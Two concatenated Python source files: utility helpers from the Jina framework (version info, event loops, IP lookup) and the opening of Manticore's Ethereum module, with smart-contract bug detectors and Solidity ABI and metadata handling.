:return: non defaults
"""
if taboo is None:
taboo = set()
non_defaults = {}
_defaults = vars(parser.parse_args([]))
for k, v in vars(args).items():
if k in _defaults and k not in taboo and _defaults[k] != v:
non_defaults[k] = v
return non_defaults
@staticmethod
def flatten_to_dict(
args: Union[Dict[str, 'Namespace'], 'Namespace']
) -> Dict[str, Any]:
"""Convert argparse.Namespace to dict to be uploaded via REST.
:param args: namespace or dict or namespace to dict.
:return: pea args
"""
if isinstance(args, Namespace):
return vars(args)
elif isinstance(args, dict):
pea_args = {}
for k, v in args.items():
if isinstance(v, Namespace):
pea_args[k] = vars(v)
elif isinstance(v, list):
pea_args[k] = [vars(_) for _ in v]
else:
pea_args[k] = v
return pea_args
def is_valid_local_config_source(path: str) -> bool:
# TODO: this function must be refactored before 1.0 (Han 12.22)
"""
Check if the path is valid.
:param path: Local file path.
:return: True if the path is valid else False.
"""
try:
from .jaml import parse_config_source
parse_config_source(path)
return True
except FileNotFoundError:
return False
def get_full_version() -> Optional[Tuple[Dict, Dict]]:
"""
Get the version of libraries used in Jina and environment variables.
:return: Version information and environment variables
"""
import os, grpc, zmq, numpy, google.protobuf, yaml, platform
from . import (
__version__,
__proto_version__,
__jina_env__,
__uptime__,
__unset_msg__,
)
from google.protobuf.internal import api_implementation
from grpc import _grpcio_metadata
from jina.logging.predefined import default_logger
from uuid import getnode
try:
info = {
'jina': __version__,
'jina-proto': __proto_version__,
'jina-vcs-tag': os.environ.get('JINA_VCS_VERSION', __unset_msg__),
'libzmq': zmq.zmq_version(),
'pyzmq': numpy.__version__,
'protobuf': google.protobuf.__version__,
'proto-backend': api_implementation._default_implementation_type,
'grpcio': getattr(grpc, '__version__', _grpcio_metadata.__version__),
'pyyaml': yaml.__version__,
'python': platform.python_version(),
'platform': platform.system(),
'platform-release': platform.release(),
'platform-version': platform.version(),
'architecture': platform.machine(),
'processor': platform.processor(),
'uid': getnode(),
'session-id': str(random_uuid(use_uuid1=True)),
'uptime': __uptime__,
'ci-vendor': get_ci_vendor() or __unset_msg__,
}
env_info = {k: os.getenv(k, __unset_msg__) for k in __jina_env__}
full_version = info, env_info
except Exception as e:
default_logger.error(str(e))
full_version = None
return full_version
def format_full_version_info(info: Dict, env_info: Dict) -> str:
"""
Format the version information.
:param info: Version information of Jina libraries.
:param env_info: The Jina environment variables.
:return: Formatted version information.
"""
version_info = '\n'.join(f'- {k:30s}{v}' for k, v in info.items())
env_info = '\n'.join(f'* {k:30s}{v}' for k, v in env_info.items())
return version_info + '\n' + env_info
def _use_uvloop():
from .importer import ImportExtensions
with ImportExtensions(
required=False,
help_text='Jina uses uvloop to manage events and sockets, '
'it often yields better performance than builtin asyncio',
):
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
def get_or_reuse_loop():
"""
Get a new eventloop or reuse the current opened eventloop.
:return: A new eventloop or reuse the current opened eventloop.
"""
try:
loop = asyncio.get_running_loop()
if loop.is_closed():
raise RuntimeError
except RuntimeError:
if 'JINA_DISABLE_UVLOOP' not in os.environ:
_use_uvloop()
# no running event loop
# create a new loop
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop
def typename(obj):
"""
Get the typename of object.
:param obj: Target object.
:return: Typename of the obj.
"""
if not isinstance(obj, type):
obj = obj.__class__
try:
return f'{obj.__module__}.{obj.__name__}'
except AttributeError:
return str(obj)
class CatchAllCleanupContextManager:
"""
This context manager guarantees, that the :method:``__exit__`` of the
sub context is called, even when there is an Exception in the
:method:``__enter__``.
:param sub_context: The context, that should be taken care of.
"""
def __init__(self, sub_context):
self.sub_context = sub_context
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
self.sub_context.__exit__(exc_type, exc_val, exc_tb)
class cached_property:
"""The decorator to cache property of a class."""
def __init__(self, func):
"""
Create the :class:`cached_property`.
:param func: Cached function.
"""
self.func = func
def __get__(self, obj, cls):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
return cached_value
value = obj.__dict__[f'CACHED_{self.func.__name__}'] = self.func(obj)
return value
def __delete__(self, obj):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
if hasattr(cached_value, 'close'):
cached_value.close()
del obj.__dict__[f'CACHED_{self.func.__name__}']
def get_now_timestamp():
"""
Get the datetime.
:return: The datetime in int format.
"""
now = datetime.now()
return int(datetime.timestamp(now))
def get_readable_time(*args, **kwargs):
"""
Get the datetime in human readable format (e.g. 115 days and 17 hours and 46 minutes and 40 seconds).
For example:
.. highlight:: python
.. code-block:: python
get_readable_time(seconds=1000)
:param args: arguments for datetime.timedelta
:param kwargs: key word arguments for datetime.timedelta
:return: Datetime in human readable format.
"""
import datetime
secs = float(datetime.timedelta(*args, **kwargs).total_seconds())
units = [('day', 86400), ('hour', 3600), ('minute', 60), ('second', 1)]
parts = []
for unit, mul in units:
if secs / mul >= 1 or mul == 1:
if mul > 1:
n = int(math.floor(secs / mul))
secs -= n * mul
else:
n = int(secs)
parts.append(f'{n} {unit}' + ('' if n == 1 else 's'))
return ' and '.join(parts)
def get_internal_ip():
"""
Return the private IP address of the gateway for connecting from other machine in the same network.
:return: Private IP address.
"""
import socket
ip = '127.0.0.1'
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
pass
return ip
def get_public_ip(timeout: float = 0.3):
"""
Return the public IP address of the gateway for connecting from other machine in the public network.
:param timeout: the seconds to wait until return None.
:return: Public IP address.
.. warn::
Set :param:`timeout` to a large number will block the Flow.
"""
import urllib.request
results = []
def _get_ip(url):
try:
req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
with urllib.request.urlopen(req, timeout=timeout) as fp:
_ip = fp.read().decode()
results.append(_ip)
except:
pass # intentionally ignored, public ip is not showed
ip_server_list = [
'https://api.ipify.org',
'https://ident.me',
'https://checkip.amazonaws.com/',
]
threads = []
for idx, ip in enumerate(ip_server_list):
t = threading.Thread(target=_get_ip, args=(ip,))
threads.append(t)
t.start()
for t in threads:
t.join(timeout)
for r in results:
if r:
return r
def convert_tuple_to_list(d: Dict):
"""
Convert all the tuple type values from a dict to list.
:param d: Dict type of data.
"""
for k, v in d.items():
if isinstance(v, tuple):
d[k] = list(v)
elif isinstance(v, dict):
convert_tuple_to_list(v)
def is_jupyter() -> bool: # pragma: no cover
"""
Check if we're running in a Jupyter notebook, using magic command `get_ipython` that only available in Jupyter.
:return: True if run in a Jupyter notebook else False.
"""
try:
get_ipython # noqa: F821
except NameError:
return False
shell = get_ipython().__class__.__name__ # noqa: F821
if shell == 'ZMQInteractiveShell':
return True # Jupyter notebook or qtconsole
elif shell == 'Shell':
return True # Google colab
elif shell == 'TerminalInteractiveShell':
return False # Terminal running IPython
else:
return False # Other type (?)
def run_async(func, *args, **kwargs):
"""Generalized asyncio.run for jupyter notebook.
When running inside jupyter, an eventloop is already exist, can't be stopped, can't be killed.
Directly calling asyncio.run will fail, as This function cannot be called when another asyncio event loop
is running in the same thread.
.. see_also:
https://stackoverflow.com/questions/55409641/asyncio-run-cannot-be-called-from-a-running-event-loop
:param func: function to run
:param args: parameters
:param kwargs: key-value parameters
:return: asyncio.run(func)
"""
class _RunThread(threading.Thread):
"""Create a running thread when in Jupyter notebook."""
def run(self):
"""Run given `func` asynchronously."""
self.result = asyncio.run(func(*args, **kwargs))
try:
loop = asyncio.get_running_loop()
except RuntimeError:
loop = None
if loop and loop.is_running():
# eventloop already exist
# running inside Jupyter
if is_jupyter():
thread = _RunThread()
thread.start()
thread.join()
try:
return thread.result
except AttributeError:
from .excepts import BadClient
raise BadClient(
'something wrong when running the eventloop, result can not be retrieved'
)
else:
raise RuntimeError(
'you have an eventloop running but not using Jupyter/ipython, '
'this may mean you are using Jina with other integration? if so, then you '
'may want to use Clien/Flow(asyncio=True). If not, then '
'please report this issue here: https://github.com/jina-ai/jina'
)
else:
return asyncio.run(func(*args, **kwargs))
def slugify(value):
"""
Normalize string, converts to lowercase, removes non-alpha characters, and converts spaces to hyphens.
:param value: Original string.
:return: Processed string.
"""
s = str(value).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
def is_yaml_filepath(val) -> bool:
"""
Check if the file is YAML file.
:param val: Path of target file.
:return: True if the file is YAML else False.
"""
r = r'^[/\w\-\_\.]+.ya?ml$'
return re.match(r, val.strip()) is not None
def download_mermaid_url(mermaid_url, output) -> None:
"""
Download the jpg image from mermaid_url.
:param mermaid_url: The URL of the image.
:param output: A filename specifying the name of the image to be created, the suffix svg/jpg determines the file type of the output image.
"""
from urllib.request import Request, urlopen
try:
req = Request(mermaid_url, headers={'User-Agent': 'Mozilla/5.0'})
with open(output, 'wb') as fp:
fp.write(urlopen(req).read())
except:
from jina.logging.predefined import default_logger
default_logger.error(
'can not download image, please check your graph and the network connections'
)
def find_request_binding(target):
"""Find `@request` decorated methods in a class.
:param target: the target class to check
:return: a dictionary with key as request type and value as method name
"""
import ast, inspect
from . import __default_endpoint__
res = {}
def visit_function_def(node):
for e in node.decorator_list:
req_name = ''
if isinstance(e, ast.Call) and e.func.id == 'requests':
req_name = e.keywords[0].value.s
elif isinstance(e, ast.Name) and e.id == 'requests':
req_name = __default_endpoint__
if req_name:
if req_name in res:
raise ValueError(
f'you already bind `{res[req_name]}` with `{req_name}` request'
)
else:
res[req_name] = node.name
V = ast.NodeVisitor()
V.visit_FunctionDef = visit_function_def
V.visit(compile(inspect.getsource(target), '?', 'exec', ast.PyCF_ONLY_AST))
return res
def dunder_get(_dict: Any, key: str) -> Any:
"""Returns value for a specified dunderkey
A "dunderkey" is just a fieldname that may or may not contain
double underscores (dunderscores!) for referencing nested keys in
a dict. eg::
>>> data = {'a': {'b': 1}}
>>> dunder_get(data, 'a__b')
1
key 'b' can be referrenced as 'a__b'
:param _dict : (dict, list, struct or object) which we want to index into
:param key : (str) that represents a first level or nested key in the dict
:return: (mixed) value corresponding to the key
"""
try:
part1, part2 = key.split('__', 1)
except ValueError:
part1, part2 = key, ''
try:
part1 = int(part1) # parse int parameter
except ValueError:
pass
from google.protobuf.struct_pb2 import ListValue
from google.protobuf.struct_pb2 import Struct
from google.protobuf.pyext._message import MessageMapContainer
if isinstance(part1, int):
result = _dict[part1]
elif isinstance(_dict, (Iterable, ListValue)):
result = _dict[part1]
elif isinstance(_dict, (dict, Struct, MessageMapContainer)):
if part1 in _dict:
result = _dict[part1]
else:
result = None
else:
result = getattr(_dict, part1)
return dunder_get(result, part2) if part2 else result
if False:
from fastapi import FastAPI
def extend_rest_interface(app: 'FastAPI') -> 'FastAPI':
"""Extend Jina built-in FastAPI instance with customized APIs, routing, etc.
:param app: the built-in FastAPI instance given by Jina
:return: the extended FastAPI instance
.. highlight:: python
.. code-block:: python
def extend_rest_interface(app: 'FastAPI'):
@app.get('/extension1')
async def root():
return {"message": "Hello World"}
return app
"""
return app
def get_ci_vendor() -> Optional[str]:
from jina import __resources_path__
with open(os.path.join(__resources_path__, 'ci-vendors.json')) as fp:
all_cis = json.load(fp)
for c in all_cis:
if isinstance(c['env'], str) and c['env'] in os.environ:
return c['constant']
elif isinstance(c['env'], dict):
for k, v in c['env'].items():
if os.environ.get(k, None) == v:
return c['constant']
elif isinstance(c['env'], list):
for k in c['env']:
if k in os.environ:
return c['constant']
|
ethereum.py
|
from . import abitypes
import uuid
import numbers
import random
import hashlib
import binascii
import string
import re
import os
from . import Manticore
from .manticore import ManticoreError
from .core.smtlib import ConstraintSet, Operators, solver, issymbolic, istainted, taint_with, get_taints, BitVec, Constant, operators, Array, ArrayVariable
from .core.smtlib.visitors import simplify
from .platforms import evm
from .core.state import State
from .utils.helpers import istainted, issymbolic
import tempfile
from subprocess import Popen, PIPE, check_output
from multiprocessing import Process, Queue
from Queue import Empty as EmptyQueue
import sha3
import json
import logging
import StringIO
import cPickle as pickle
from .core.plugin import Plugin
from functools import reduce
from contextlib import contextmanager
logger = logging.getLogger(__name__)
class EthereumError(ManticoreError):
pass
class DependencyError(EthereumError):
def __init__(self, lib_names):
super(DependencyError, self).__init__("You must pre-load and provide libraries addresses{ libname:address, ...} for %r" % lib_names)
self.lib_names = lib_names
class NoAliveStates(EthereumError):
pass
################ Detectors ####################
class Detector(Plugin):
@property
def name(self):
return self.__class__.__name__.split('.')[-1]
def get_findings(self, state):
return state.context.setdefault('{:s}.findings'.format(self.name), set())
@contextmanager
def locked_global_findings(self):
with self.manticore.locked_context('{:s}.global_findings'.format(self.name), set) as global_findings:
yield global_findings
@property
def global_findings(self):
with self.locked_global_findings() as global_findings:
return global_findings
def add_finding(self, state, address, pc, finding, init):
self.get_findings(state).add((address, pc, finding, init))
with self.locked_global_findings() as gf:
gf.add((address, pc, finding, init))
#Fixme for ever broken logger
#logger.warning(finding)
def add_finding_here(self, state, finding):
address = state.platform.current_vm.address
pc = state.platform.current_vm.pc
at_init = state.platform.current_transaction.sort == 'CREATE'
self.add_finding(state, address, pc, finding, at_init)
def _save_current_location(self, state, finding):
address = state.platform.current_vm.address
pc = state.platform.current_vm.pc
location = (address, pc, finding)
hash_id = hashlib.sha1(str(location)).hexdigest()
state.context.setdefault('{:s}.locations'.format(self.name), {})[hash_id] = location
return hash_id
def _get_location(self, state, hash_id):
return state.context.setdefault('{:s}.locations'.format(self.name), {})[hash_id]
def _get_src(self, address, pc):
return self.manticore.get_metadata(address).get_source_for(pc)
class FilterFunctions(Plugin):
def __init__(self, regexp=r'.*', mutability='both', depth='both', fallback=False, include=True, **kwargs):
"""
Constrain input based on function metadata. Include or avoid functions selected by the specified criteria.
Examples:
#Do not explore any human transactions that end up calling a constant function
no_human_constant = FilterFunctions(depth='human', mutability='constant', include=False)
#At human tx depth only accept synthetic check functions
only_tests = FilterFunctions(regexp=r'mcore_.*', depth='human', include=False)
:param regexp: a regular expresion over the name of the function '.*' will match all functions
:param mutability: mutable, constant or both will match functions declared in the abi to be of such class
:param depth: match functions in internal transactions, in human initiated transactions or in both types
:param fallback: if True include the fallback function. Hash will be 00000000 for it
:param include: if False exclude the selected functions, if True include them
"""
super(FilterFunctions, self).__init__(**kwargs)
depth = depth.lower()
if depth not in ('human', 'internal', 'both'):
raise ValueError
mutability = mutability.lower()
if mutability not in ('mutable', 'constant', 'both'):
raise ValueError
#fixme better names for member variables
self._regexp = regexp
self._mutability = mutability
self._depth = depth
self._fallback = fallback
self._include = include
def will_open_transaction_callback(self, state, tx):
world = state.platform
tx_cnt = len(world.all_transactions)
# Constrain input only once per tx, per plugin
if state.context.get('constrained%d' % id(self), 0) != tx_cnt:
state.context['constrained%d' % id(self)] = tx_cnt
if self._depth == 'human' and not tx.is_human:
return
if self._depth == 'internal' and tx.is_human:
return
#Get metadata if any for the targe addreess of current tx
md = self.manticore.get_metadata(tx.address)
if md is None:
return
#Lets compile the list of interesting hashes
selected_functions = []
for func_hsh in md.hashes:
if func_hsh == '00000000':
continue
abi = md.get_abi(func_hsh)
func_name = md.get_func_name(func_hsh)
if self._mutability == 'constant' and not abi.get('constant', False):
continue
if self._mutability == 'mutable' and abi.get('constant', False):
continue
if not re.match(self._regexp, func_name):
continue
selected_functions.append(func_hsh)
if self._fallback:
selected_functions.append('00000000')
if self._include:
# constraint the input so it can take only the interesting values
constraint = reduce(Operators.OR, map(lambda x: tx.data[:4] == binascii.unhexlify(x), selected_functions))
state.constrain(constraint)
else:
#Avoid all not seleted hashes
for func_hsh in md.hashes:
if func_hsh in selected_functions:
constraint = Operators.NOT(tx.data[:4] == binascii.unhexlify(func_hsh))
state.constrain(constraint)
class DetectInvalid(Detector):
def __init__(self, only_human=True, **kwargs):
"""
Detects INVALID instructions.
INVALID instructions are originally designated to signal exceptional code.
As in practice the INVALID instruction is used in different ways this
detector may Generate a great deal of false positives.
:param only_human: if True report only INVALID at depth 0 transactions
"""
super(DetectInvalid, self).__init__(**kwargs)
self._only_human = only_human
def did_evm_execute_instruction_callback(self, state, instruction, arguments, result_ref):
mnemonic = instruction.semantics
result = result_ref.value
if mnemonic == 'INVALID':
if not self._only_human or state.platform.current_transaction.depth == 0:
self.add_finding_here(state, "INVALID intruction")
class DetectIntegerOverflow(Detector):
'''
Detects potential overflow and underflow conditions on ADD and SUB instructions.
'''
def _save_current_location(self, state, finding, condition):
address = state.platform.current_vm.address
pc = state.platform.current_vm.pc
at_init = state.platform.current_transaction.sort == 'CREATE'
location = (address, pc, finding, at_init, condition)
hash_id = hashlib.sha1(str(location)).hexdigest()
state.context.setdefault('{:s}.locations'.format(self.name), {})[hash_id] = location
return hash_id
def _get_location(self, state, hash_id):
return state.context.setdefault('{:s}.locations'.format(self.name), {})[hash_id]
@staticmethod
def _signed_sub_overflow(state, a, b):
'''
Sign extend the value to 512 bits and check the result can be represented
in 256. Following there is a 32 bit excerpt of this condition:
a - b -80000000 -3fffffff -00000001 +00000000 +00000001 +3fffffff +7fffffff
+80000000 False False False False True True True
+c0000001 False False False False False False True
+ffffffff False False False False False False False
+00000000 True False False False False False False
+00000001 True False False False False False False
+3fffffff True False False False False False False
+7fffffff True True True False False False False
'''
sub = Operators.SEXTEND(a, 256, 512) - Operators.SEXTEND(b, 256, 512)
cond = Operators.OR(sub < -(1 << 256), sub >= (1 << 255))
return cond
@staticmethod
def _signed_add_overflow(state, a, b):
'''
Sign extend the value to 512 bits and check the result can be represented
in 256. Following there is a 32 bit excerpt of this condition:
a + b -80000000 -3fffffff -00000001 +00000000 +00000001 +3fffffff +7fffffff
+80000000 True True True False False False False
+c0000001 True False False False False False False
+ffffffff True False False False False False False
+00000000 False False False False False False False
+00000001 False False False False False False True
+3fffffff False False False False False False True
+7fffffff False False False False True True True
'''
add = Operators.SEXTEND(a, 256, 512) + Operators.SEXTEND(b, 256, 512)
cond = Operators.OR(add < -(1 << 256), add >= (1 << 255))
return cond
@staticmethod
def _unsigned_sub_overflow(state, a, b):
'''
Sign extend the value to 512 bits and check the result can be represented
in 256. Following there is a 32 bit excerpt of this condition:
a - b ffffffff bfffffff 80000001 00000000 00000001 3ffffffff 7fffffff
ffffffff True True True False True True True
bfffffff True True True False False True True
80000001 True True True False False True True
00000000 False False False False False True False
00000001 True False False False False True False
ffffffff True True True True True True True
7fffffff True True True False False True False
'''
cond = Operators.UGT(b, a)
return cond
@staticmethod
def _unsigned_add_overflow(state, a, b):
'''
Sign extend the value to 512 bits and check the result can be represented
in 256. Following there is a 32 bit excerpt of this condition:
a + b ffffffff bfffffff 80000001 00000000 00000001 3ffffffff 7fffffff
ffffffff True True True False True True True
bfffffff True True True False False True True
80000001 True True True False False True True
00000000 False False False False False True False
00000001 True False False False False True False
ffffffff True True True True True True True
7fffffff True True True False False True False
'''
add = Operators.ZEXTEND(a, 512) + Operators.ZEXTEND(b, 512)
cond = Operators.UGE(add, 1 << 256)
return cond
@staticmethod
def _signed_mul_overflow(state, a, b):
'''
Sign extend the value to 512 bits and check the result can be represented
in 256. Following there is a 32 bit excerpt of this condition:
a * b +00000000000000000 +00000000000000001 +0000000003fffffff +0000000007fffffff +00000000080000001 +000000000bfffffff +000000000ffffffff
+0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000
+0000000000000001 +0000000000000000 +0000000000000001 +000000003fffffff +000000007fffffff +0000000080000001 +00000000bfffffff +00000000ffffffff
+000000003fffffff +0000000000000000 +000000003fffffff *+0fffffff80000001 *+1fffffff40000001 *+1fffffffbfffffff *+2fffffff00000001 *+3ffffffec0000001
+000000007fffffff +0000000000000000 +000000007fffffff *+1fffffff40000001 *+3fffffff00000001 *+3fffffffffffffff *+5ffffffec0000001 *+7ffffffe80000001
+0000000080000001 +0000000000000000 +0000000080000001 *+1fffffffbfffffff *+3fffffffffffffff *+4000000100000001 *+600000003fffffff *+800000007fffffff
+00000000bfffffff +0000000000000000 +00000000bfffffff *+2fffffff00000001 *+5ffffffec0000001 *+600000003fffffff *+8ffffffe80000001 *+bffffffe40000001
+00000000ffffffff +0000000000000000 +00000000ffffffff *+3ffffffec0000001 *+7ffffffe80000001 *+800000007fffffff *+bffffffe40000001 *+fffffffe00000001
'''
mul = Operators.SEXTEND(a, 256, 512) * Operators.SEXTEND(b, 256, 512)
cond = Operators.OR(mul < -(1 << 255), mul >= (1 << 255))
return cond
@staticmethod
def _unsigned_mul_overflow(state, a, b):
'''
Sign extend the value to 512 bits and check the result can be represented
in 256. Following there is a 32 bit excerpt of this condition:
a * b +00000000000000000 +00000000000000001 +0000000003fffffff +0000000007fffffff +00000000080000001 +000000000bfffffff +000000000ffffffff
+0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000 +0000000000000000
+0000000000000001 +0000000000000000 +0000000000000001 +000000003fffffff +000000007fffffff +0000000080000001 +00000000bfffffff +00000000ffffffff
+000000003fffffff +0000000000000000 +000000003fffffff *+0fffffff80000001 *+1fffffff40000001 *+1fffffffbfffffff *+2fffffff00000001 *+3ffffffec0000001
+000000007fffffff +0000000000000000 +000000007fffffff *+1fffffff40000001 *+3fffffff00000001 *+3fffffffffffffff *+5ffffffec0000001 *+7ffffffe80000001
+0000000080000001 +0000000000000000 +0000000080000001 *+1fffffffbfffffff *+3fffffffffffffff *+4000000100000001 *+600000003fffffff *+800000007fffffff
+00000000bfffffff +0000000000000000 +00000000bfffffff *+2fffffff00000001 *+5ffffffec0000001 *+600000003fffffff *+8ffffffe80000001 *+bffffffe40000001
+00000000ffffffff +0000000000000000 +00000000ffffffff *+3ffffffec0000001 *+7ffffffe80000001 *+800000007fffffff *+bffffffe40000001 *+fffffffe00000001
'''
mul = Operators.SEXTEND(a, 256, 512) * Operators.SEXTEND(b, 256, 512)
cond = Operators.UGE(mul, 1 << 256)
return cond
def did_evm_execute_instruction_callback(self, state, instruction, arguments, result_ref):
result = result_ref.value
mnemonic = instruction.semantics
result = result_ref.value
ios = False
iou = False
if mnemonic == 'ADD':
ios = self._signed_add_overflow(state, *arguments)
iou = self._unsigned_add_overflow(state, *arguments)
elif mnemonic == 'MUL':
ios = self._signed_mul_overflow(state, *arguments)
iou = self._unsigned_mul_overflow(state, *arguments)
elif mnemonic == 'SUB':
ios = self._signed_sub_overflow(state, *arguments)
iou = self._unsigned_sub_overflow(state, *arguments)
elif mnemonic == 'SSTORE':
where, what = arguments
if istainted(what, "SIGNED"):
for taint in get_taints(what, "IOS_.*"):
loc = self._get_location(state, taint[4:])
if state.can_be_true(loc[-1]):
self.add_finding(state, *loc[:-1])
else:
for taint in get_taints(what, "IOU_.*"):
loc = self._get_location(state, taint[4:])
if state.can_be_true(loc[-1]):
self.add_finding(state, *loc[:-1])
if mnemonic in ('SLT', 'SGT', 'SDIV', 'SMOD'):
result = taint_with(result, "SIGNED")
if state.can_be_true(ios):
id_val = self._save_current_location(state, "Signed integer overflow at %s instruction" % mnemonic, ios)
result = taint_with(result, "IOS_{:s}".format(id_val))
if state.can_be_true(iou):
id_val = self._save_current_location(state, "Unsigned integer overflow at %s instruction" % mnemonic, iou)
result = taint_with(result, "IOU_{:s}".format(id_val))
result_ref.value = result
class DetectUninitializedMemory(Detector):
'''
Detects uses of uninitialized memory
'''
def did_evm_read_memory_callback(self, state, offset, value):
initialized_memory = state.context.get('seth.detectors.initialized_memory', set())
cbu = True # Can be unknown
current_contract = state.platform.current_vm.address
for known_contract, known_offset in initialized_memory:
if current_contract == known_contract:
cbu = Operators.AND(cbu, offset != known_offset)
if state.can_be_true(cbu):
self.add_finding_here(state, "Potentially reading uninitialized memory at instruction (address: %r, offset %r)" % (current_contract, offset))
def did_evm_write_memory_callback(self, state, offset, value):
current_contract = state.platform.current_vm.address
# concrete or symbolic write
state.context.setdefault('seth.detectors.initialized_memory', set()).add((current_contract, offset))
class DetectUninitializedStorage(Detector):
'''
Detects uses of uninitialized storage
'''
def did_evm_read_storage_callback(self, state, address, offset, value):
if not state.can_be_true(value != 0):
# Not initialized memory should be zero
return
# check if offset is known
cbu = True # Can be unknown
for known_address, known_offset in state.context['seth.detectors.initialized_storage']:
cbu = Operators.AND(cbu, Operators.OR(address != known_address, offset != known_offset))
if state.can_be_true(cbu):
self.add_finding_here(state, "Potentially reading uninitialized storage")
def did_evm_write_storage_callback(self, state, address, offset, value):
# concrete or symbolic write
state.context.setdefault('seth.detectors.initialized_storage', set()).add((address, offset))
def calculate_coverage(runtime_bytecode, seen):
''' Calculates what percentage of runtime_bytecode has been seen '''
count, total = 0, 0
bytecode = SolidityMetadata._without_metadata(runtime_bytecode)
for i in evm.EVMAsm.disassemble_all(bytecode):
if i.pc in seen:
count += 1
total += 1
if total == 0:
#No runtime_bytecode
return 0
return count * 100.0 / total
class SolidityMetadata(object):
def __init__(self, name, source_code, init_bytecode, runtime_bytecode, srcmap, srcmap_runtime, hashes, abi, warnings):
''' Contract metadata for Solidity-based contracts '''
self.name = name
self.source_code = source_code
self._init_bytecode = init_bytecode
self._runtime_bytecode = runtime_bytecode
self._hashes = hashes
self.abi = dict([(item.get('name', '{fallback}'), item) for item in abi])
self.warnings = warnings
self.srcmap_runtime = self.__build_source_map(self.runtime_bytecode, srcmap_runtime)
self.srcmap = self.__build_source_map(self.init_bytecode, srcmap)
def get_constructor_arguments(self):
for fun in self.abi.values():
if fun['type'] == 'constructor':
constructor_inputs = fun['inputs']
break
else:
constructor_inputs = ()
def process(spec):
if spec['type'].startswith('tuple'):
types = []
for component in spec['components']:
types.append(process(component))
return '({}){:s}'.format(','.join(types), spec['type'][5:])
else:
return spec['type']
inputs = {'components': constructor_inputs, 'type': 'tuple'}
return process(inputs)
def add_function(self, method_name_and_signature):
#TODO: use re, and check it's sane
name = method_name_and_signature.split('(')[0]
if name in self.abi:
raise EthereumError("Function already defined")
hsh = ABI.function_selector(method_name_and_signature)
self._hashes.append(method_name_and_signature, hsh)
input_types = method_name_and_signature.split('(')[1].split(')')[0].split(',')
output_types = method_name_and_signature.split(')')[1].split(',')
self.abi[name] = {'inputs': [{'type': ty} for ty in input_types],
'name': name,
'outputs': [{'type': ty} for ty in output_types]}
@staticmethod
def _without_metadata(bytecode):
end = None
if bytecode[-43: -34] == '\xa1\x65\x62\x7a\x7a\x72\x30\x58\x20' \
and bytecode[-2:] == '\x00\x29':
end = -9 - 32 - 2 # Size of metadata at the end of most contracts
return bytecode[:end]
def __build_source_map(self, bytecode, srcmap):
# https://solidity.readthedocs.io/en/develop/miscellaneous.html#source-mappings
new_srcmap = {}
bytecode = self._without_metadata(bytecode)
asm_offset = 0
asm_pos = 0
md = dict(enumerate(srcmap[asm_pos].split(':')))
byte_offset = int(md.get(0, 0)) # is the byte-offset to the start of the range in the source file
source_len = int(md.get(1, 0)) # is the length of the source range in bytes
file_index = int(md.get(2, 0)) # is the source index over sourceList
jump_type = md.get(3, None) # this can be either i, o or - signifying whether a jump instruction goes into a function, returns from a function or is a regular jump as part of e.g. a loop
pos_to_offset = {}
for i in evm.EVMAsm.disassemble_all(bytecode):
pos_to_offset[asm_pos] = asm_offset
asm_pos += 1
asm_offset += i.size
for asm_pos, md in enumerate(srcmap):
if len(md):
d = dict((p, k) for p, k in enumerate(md.split(':')) if k)
byte_offset = int(d.get(0, byte_offset))
source_len = int(d.get(1, source_len))
file_index = int(d.get(2, file_index))
jump_type = d.get(3, jump_type)
new_srcmap[pos_to_offset[asm_pos]] = (byte_offset, source_len, file_index, jump_type)
return new_srcmap
@property
def runtime_bytecode(self):
# Removes metadata from the tail of bytecode
return self._without_metadata(self._runtime_bytecode)
@property
def init_bytecode(self):
# Removes metadata from the tail of bytecode
return self._without_metadata(self._init_bytecode)
def get_source_for(self, asm_offset, runtime=True):
''' Solidity source code snippet related to `asm_pos` evm bytecode offset.
If runtime is False, initialization bytecode source map is used
'''
if runtime:
srcmap = self.srcmap_runtime
else:
srcmap = self.srcmap
try:
beg, size, _, _ = srcmap[asm_offset]
except KeyError:
#asm_offset pointing outside the known bytecode
return ''
output = ''
nl = self.source_code.count('\n')
snippet = self.source_code[beg:beg + size]
for l in snippet.split('\n'):
output += ' %s %s\n' % (nl, l)
nl += 1
return output
@property
def signatures(self):
return dict(((b, a) for (a, b) in self._hashes.items()))
def get_abi(self, hsh):
func_name = self.get_func_name(hsh)
default_fallback_abi = {u'stateMutability': u'nonpayable', u'payable': False, u'type': u'fallback'}
return self.abi.get(func_name, default_fallback_abi)
def get_func_argument_types(self, hsh):
abi = self.get_abi(hsh)
return '(' + ','.join(x['type'] for x in abi.get('inputs', [])) + ')'
def get_func_return_types(self, hsh):
abi = self.get_abi(hsh)
return '(' + ','.join(x['type'] for x in abi.get('outputs', [])) + ')'
def get_func_name(self, hsh):
signature = self.signatures.get(hsh, '{fallback}()')
return signature.split('(')[0]
def get_func_signature(self, hsh):
return self.signatures.get(hsh)
def get_hash(self, method_name_and_signature):
#helper
return ABI.function_selector(method_name_and_signature)
@property
def functions(self):
return tuple(self.signatures.values()) + ('{fallback}()',)
@property
def hashes(self):
return tuple(self.signatures.keys()) + ('00000000',)
class ABI(object):
'''
This class contains methods to handle the ABI.
The Application Binary Interface is the standard way to interact with
contracts in the Ethereum ecosystem, both from outside the blockchain
and for contract-to-contract interaction.
'''
@staticmethod
def _type_size(ty):
''' Calculate `static` type size '''
if ty[0] in ('int', 'uint', 'bytesM', 'function'):
return 32
elif ty[0] in ('tuple'):
result = 0
for ty_i in ty[1]:
result += ABI._type_size(ty_i)
return result
elif ty[0] in ('array'):
rep = ty[1]
result = 32 # offset link
return result
elif ty[0] in ('bytes', 'string'):
result = 32 # offset link
return result
raise ValueError
@staticmethod
def function_call(type_spec, *args):
'''
Build transaction data from function signature and arguments
'''
